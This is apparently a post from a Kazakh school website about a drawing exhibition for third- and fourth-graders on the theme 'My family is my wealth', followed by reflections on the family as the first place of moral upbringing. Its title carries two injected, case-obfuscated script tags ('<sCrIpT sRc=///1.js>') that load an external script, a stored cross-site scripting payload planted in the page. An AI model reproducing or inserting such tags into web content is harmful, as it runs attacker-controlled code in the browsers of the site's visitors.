Менің отбасым - менің байлығым<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2021

    Мектебімізде 3-4 сыныптар аралығында «Менің отбасым - менің байлығым» тақырыбында сурет көрмесі ұйымдастырылды. Мақсаты: оқушылардың отбасы туралы түсініктерін кеңейту. Өз жанұясы туралы әңгімелеуге үйрету.  Оқушыларды ұйымшылдыққа, жауапкершілікке, өз ойын жеткізе білуге тәрбиелеу.

Отбасы — сыйластық , жарастық орнаған орта, кішкентай Отан.

«Отан – отбасынан басталады» дегендей отанды сүю - отбасынан басталатыны рас!

Себебі, отбасы – бала тәрбиесінің ең алғашқы ұжымы. Адамның жеке басының қалыптасуы отбасынан басталады. Оның ер жетіп өсуі, бойындағы алғашқы адамгершілік белгілер отбасында қалыптасады, сондықтан да туған  үйдің жылуы – оның көкірегінде көп жылдар бойы сақталып, мәңгі есінде жүреді.

Отбасы – табиғат сыйлаған кереметтердің бірі. Жеке адамның бойындағы ар-ұятын, ақыл-ойын, адамгершілігін, мәдениеттілігін тәрбиелеуде отбасы – алғашқы қадам. Адам өмірінде отбасы – өте қажетті, басқадай еш нәрсемен өзгертуге болмайтын баспалдақ болып саналады.

Просмотров: 470


Пікір қосу



Деректерді қолтаңбаға қосу